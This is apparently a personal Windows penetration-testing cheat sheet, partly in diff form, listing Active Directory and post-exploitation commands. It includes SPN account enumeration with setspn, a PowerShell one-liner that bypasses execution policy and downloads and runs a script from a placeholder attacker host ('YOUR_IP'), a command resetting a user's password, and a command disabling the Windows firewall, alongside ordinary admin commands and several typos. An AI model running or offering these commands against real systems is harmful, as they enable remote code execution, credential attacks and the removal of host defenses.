hson2654/attarki/win.md

   gpupdate /force      #update the gp group policy. \n net share sharename=c:\foldername          # share a folder setspn HTTP/nameofhost(sql.inmy.com) inmy\sqladmin
+>setspn -T medin -Q ​ */*  //to extract all accouint in SPN, when we have a normal user in a hsot in AD
+>
+  //pwershell to downlaod file
+      powershell -ep bypass;
+      iex​(New-Object Net.WebClient).DownloadString('https://YOUR_IP/xx')
+      or curl http://xxx/xx -o xx
   >net accounts    /login policy
   >Write-Output "${env:COMPUTERNAME}"  //get computername
   //if the display of shell is not recgnized,
->    chcp 65001  //change to utf encode
+    chcp 65001  //change to utf encode

     netstat -nao //check the services running on Win

     net user $username $passwd  //change the passwd of a user
   #### turn off firewall
     $netsh advirewall set allprofiles state off
   #### check firewall status